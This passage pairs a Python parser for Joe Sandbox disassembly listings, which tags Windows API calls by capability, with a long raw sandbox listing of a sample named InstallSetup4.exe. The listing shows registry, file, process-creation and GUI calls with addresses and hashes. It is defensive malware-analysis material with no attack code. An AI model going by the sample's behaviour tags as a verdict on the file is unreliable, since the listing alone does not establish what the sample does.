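    "LoadLibraryExW": "library-load",
    "GetTempFileNameW": "temp-file",
    "SetFileTime": "timestamp-change",
}


@dataclass
class FunctionListing:
    start: str                                        # function start address as listed
    direct_apis: list = field(default_factory=list)   # (api, module, ref)
    subcall_apis: list = field(default_factory=list)  # (callee, api, module, ref)
    strings: list = field(default_factory=list)       # "String ID" split on '$'
    instruction_fuzzy_hash: str = ""

    def tags(self):
        return sorted({CAPABILITY_TAGS[a] for a, _, _ in self.direct_apis
                       if a in CAPABILITY_TAGS})


def parse_listing(text):
    funcs, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("control_flow_graph "):
            # "control_flow_graph <node> <start>-<end> ..." opens a new function
            cur = FunctionListing(start=line.split()[2].split("-")[0])
            funcs.append(cur)
            section = None
            continue
        if cur is None:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m is None:
                continue
            if m["sub"]:
                cur.subcall_apis.append((m["sub"], m["api"], m["mod"], m["ref"]))
            else:
                cur.direct_apis.append((m["api"], m["mod"], m["ref"]))
        elif section == "Similarity" and line.startswith("• String ID: "):
            cur.strings = line[len("• String ID: "):].split("$")
        elif section == "Similarity" and line.startswith("• Instruction Fuzzy Hash: "):
            cur.instruction_fuzzy_hash = line[len("• Instruction Fuzzy Hash: "):]
    return funcs


def find_by_api(funcs, api_name):
    """Start addresses of functions calling api_name directly (not via a subcall)."""
    return [f.start for f in funcs if any(a == api_name for a, _, _ in f.direct_apis)]


# Constructed sample: three blocks excerpted from the listing on this page, trimmed.
SAMPLE = r"""
control_flow_graph 482 4068db-4068fb GetSystemDirectoryW 483 4068fd 482->483
APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
• wsprintfW.USER32 ref: 0040692D
• LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
Strings
Similarity
• String ID: %s%S.dll$UXTHEME
• Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

Control-flow Graph
control_flow_graph 546 406076-406082 547 406083-4060b7 GetTickCount GetTempFileNameW 546->547
APIs
• GetTickCount.KERNEL32 ref: 00406094
• GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\), ref: 004060AF
Similarity
• String ID: C:\Users\user\AppData\Local\Temp\$nsa

control_flow_graph 523 405f2e-405f49 call 406557 call 405ed1 528 405f4b-405f4d 523->528
APIs
  • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
• lstrlenW.KERNEL32(C:\,00000000,C:\), ref: 00405F87
• GetFileAttributesW.KERNEL32(C:\,C:\), ref: 00405F97
Similarity
• String ID: C:\$C:\Users\user\AppData\Local\Temp\
• API String ID: 3248276644-263117582
"""

if __name__ == "__main__":
    funcs = parse_listing(SAMPLE)
    for f in funcs:
        print(f.start, f.tags(), [a for a, _, _ in f.direct_apis], f.strings)
    print("GetTempFileNameW callers:", find_by_api(funcs, "GetTempFileNameW"))
```

Subcall entries are kept apart from direct calls on purpose: Joe Sandbox repeats the same 004055DC SendMessageW/SetWindowTextW lines under every caller, so counting them as the caller's own behaviour would make nearly every function look like a GUI routine.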

                                                                                             Control-flow Graph
                                                                                            control_flow_graph 592 40248f-4024c0 call 402dab * 2 call 402e3b 599 4024c6-4024d0 592->599 600 402c2f-402c3e 592->600 601 4024d2-4024df call 402dab lstrlenW 599->601 602 4024e3-4024e6 599->602 601->602 605 4024e8-4024f9 call 402d89 602->605 606 4024fa-4024fd 602->606 605->606 610 40250e-402522 RegSetValueExW 606->610 611 4024ff-402509 call 4032b9 606->611 614 402524 610->614 615 402527-402608 RegCloseKey 610->615 611->610 614->615 615->600 617 402933-40293a 615->617 617->600
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(0040B5F0,00000023,00000011,00000002), ref: 004024DA
                                                                                            • RegSetValueExW.KERNEL32(?,?,?,?,0040B5F0,00000000,00000011,00000002), ref: 0040251A
                                                                                            • RegCloseKey.KERNEL32(?,?,?,0040B5F0,00000000,00000011,00000002), ref: 00402602
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseValuelstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2655323295-0
                                                                                            • Opcode ID: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
                                                                                            • Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
                                                                                            • Opcode Fuzzy Hash: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
                                                                                            • Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58

                                                                                             Control-flow Graph
                                                                                            control_flow_graph 618 4025a3-4025bf call 402deb call 402d89 623 402933-40293a 618->623 624 4025c5-4025d0 618->624 627 402c2f-402c3e 623->627 625 4025d2-4025dc RegEnumKeyW 624->625 626 4025de-4025f1 RegEnumValueW 624->626 628 4025fa-402608 RegCloseKey 625->628 626->628 629 4025f3 626->629 628->623 628->627 629->628
                                                                                            APIs
                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                                                                            • RegCloseKey.KERNEL32(?,?,?,0040B5F0,00000000,00000011,00000002), ref: 00402602
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Enum$CloseValue
                                                                                            • String ID:
                                                                                            • API String ID: 397863658-0
                                                                                            • Opcode ID: 83fa7e78d7cc85db6417fd9f9f7c0855fa471106849bec38802f500a3fbec511
                                                                                            • Instruction ID: 3ff9118d8f065173f4d59a226331d9f1933cb8120024fa56e57d9af690fc2804
                                                                                            • Opcode Fuzzy Hash: 83fa7e78d7cc85db6417fd9f9f7c0855fa471106849bec38802f500a3fbec511
                                                                                            • Instruction Fuzzy Hash: 16017171904105ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB85E40A66D

                                                                                             Control-flow Graph
                                                                                            control_flow_graph 634 405c1b-405c2c call 406022 637 405c5c 634->637 638 405c2e-405c34 634->638 639 405c5e-405c60 637->639 640 405c36-405c3c RemoveDirectoryW 638->640 641 405c3e DeleteFileW 638->641 642 405c44-405c46 640->642 641->642 643 405c48-405c4b 642->643 644 405c4d-405c52 642->644 643->639 644->637 645 405c54-405c56 SetFileAttributesW 644->645 645->637
                                                                                            APIs
                                                                                              • Part of subcall function 00406022: GetFileAttributesW.KERNEL32(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
                                                                                              • Part of subcall function 00406022: SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B
                                                                                            • RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405DFD), ref: 00405C36
                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,00405DFD), ref: 00405C3E
                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C56
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                            • String ID:
                                                                                            • API String ID: 1655745494-0
                                                                                            • Opcode ID: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
                                                                                            • Instruction ID: 2cd832b5149a82f614695d38d41b3aba95dfe4f26efc6ce9164d7e3db346642e
                                                                                            • Opcode Fuzzy Hash: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
                                                                                            • Instruction Fuzzy Hash: 9AE02B3110D7915AE32077705E0CB5F2AD8DF86324F05093AF492F10C0DB78488A8A7E
                                                                                            APIs
                                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
                                                                                            • RegCloseKey.KERNEL32(?,?,?,0040B5F0,00000000,00000011,00000002), ref: 00402602
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseQueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3356406503-0
                                                                                            • Opcode ID: 49ca1381ded4af27f8ac224b17b3ae694fb74f22b67379b644ce572c4f680cb7
                                                                                            • Instruction ID: fa4e9c421320e09d3f2bb14c05bc69cdd2f01bdd483ca55c6e8c3e2e171c6fbc
                                                                                            • Opcode Fuzzy Hash: 49ca1381ded4af27f8ac224b17b3ae694fb74f22b67379b644ce572c4f680cb7
                                                                                            • Instruction Fuzzy Hash: 11116A71900219EBDB14DFA0DA989AEB7B4FF04349B20447FE406B62C0D7B85A45EB5E
                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                            • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                                                            • Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
                                                                                            • Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                                                            • Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNEL32(00437800,?), ref: 00405AED
                                                                                            • GetLastError.KERNEL32 ref: 00405AFB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                            • Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
                                                                                            • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                            • Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9
                                                                                            APIs
                                                                                            • CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                                            • CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateHandleProcess
                                                                                            • String ID:
                                                                                            • API String ID: 3712363035-0
                                                                                            • Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                                                            • Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
                                                                                            • Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                                                            • Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                              • Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                              • Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
                                                                                              • Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2547128583-0
                                                                                            • Opcode ID: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
                                                                                            • Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
                                                                                            • Opcode Fuzzy Hash: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
                                                                                            • Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNEL32(00000003,004030C2,C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,80000000,00000003), ref: 0040604B
                                                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCreate
                                                                                            • String ID:
                                                                                            • API String ID: 415043291-0
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNEL32(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,00403A82,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B5A
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\nsr70E6.tmp\, xrefs: 00403B6E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsr70E6.tmp\
                                                                                            • API String ID: 2962429428-3481843031
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                            • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            APIs
                                                                                            • RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 0040641B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            APIs
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00403247,?), ref: 004034F8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 973152223-0
                                                                                            APIs
                                                                                              • Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00428E20,76F923A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                              • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00428E20,76F923A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                              • Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
                                                                                              • Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                              • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                              • Part of subcall function 00405B3A: CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                                              • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                                              • Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
                                                                                              • Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29
                                                                                              • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2972824698-0
                                                                                            • Opcode ID: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
                                                                                            • Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
                                                                                            • Opcode Fuzzy Hash: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
                                                                                            • Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405779
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405788
                                                                                            • GetClientRect.USER32(?,?), ref: 004057C5
                                                                                            • GetSystemMetrics.USER32(00000002), ref: 004057CC
                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405868
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405889
                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405797
                                                                                              • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004058DB
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
